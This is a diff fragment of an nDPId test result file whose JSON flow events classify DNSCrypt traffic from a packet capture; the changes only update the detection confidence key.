00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":946739311306,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739311306,"pkt":"ZmZmZmZmRERERERECABFAADShQAAADIRADHNuXR0CgAAAQIpqggAvpKvnSmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAn\/hr1LBKsWo8ISWGing3CJIxyJebVH0i+FiEft0kNqLwa8d8MG0HYasP8XBuGRRYuXbJWON+8OmftD\/GOCqkDQBv6De0v2\/+w89vsWNxuh1o1S9D9qyf\/kIslLiOA5h7AG\/oN7S\/b\/5fU2VhX1NlYV9UtuE="} 
@@ -407,26 +407,26 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":946739311314,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739311314,"pkt":"ZmZmZmZmRERERERECABFAADShQMAADIRAC7NuXR0CgAAAQIplYYAvqc0nSaBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdmcmVldHNhA29yZwAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAn\/hr1LBKsWo8ISWGing3CJIxyJebVH0i+FiEft0kNqLwa8d8MG0HYasP8XBuGRRYuXbJWON+8OmftD\/GOCqkDQBv6De0v2\/+w89vsWNxuh1o1S9D9qyf\/kIslLiOA5h7AG\/oN7S\/b\/5fU2VhX1NlYV9UtuE="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAIcgu5AAL0RWGMKAAABNEHrgdoaAbsCCOKYCnMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAXcgu8gAL0RdKIKAAABNEHrgbTpAbsGBA+NCnABAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":46313,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAIcgvBAAL0RWGEKAAABNEHrgc6vAbsCCOKYCnEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 
-00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":210,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311802} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":210,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAABQgu8Aub0RmXUKAAABNEHrgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAXcgvEgAL0RdKAKAAABNEHrgbpFAbsGBAozCm4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":211,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":47685,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":946739311802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAAIcgvJAAL0RWF8KAAABNEHrgdqrAbsCCOKYCm8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydApkZWZmZXItZG5zAmF1AAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55979,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":213,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739311802} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":213,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739311802,"pkt":"REREREREZmZmZmZmCABFAABQgvEAub0RmXMKAAABNEHrgQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739311802,"flow_last_seen":946739311802,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739311802,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
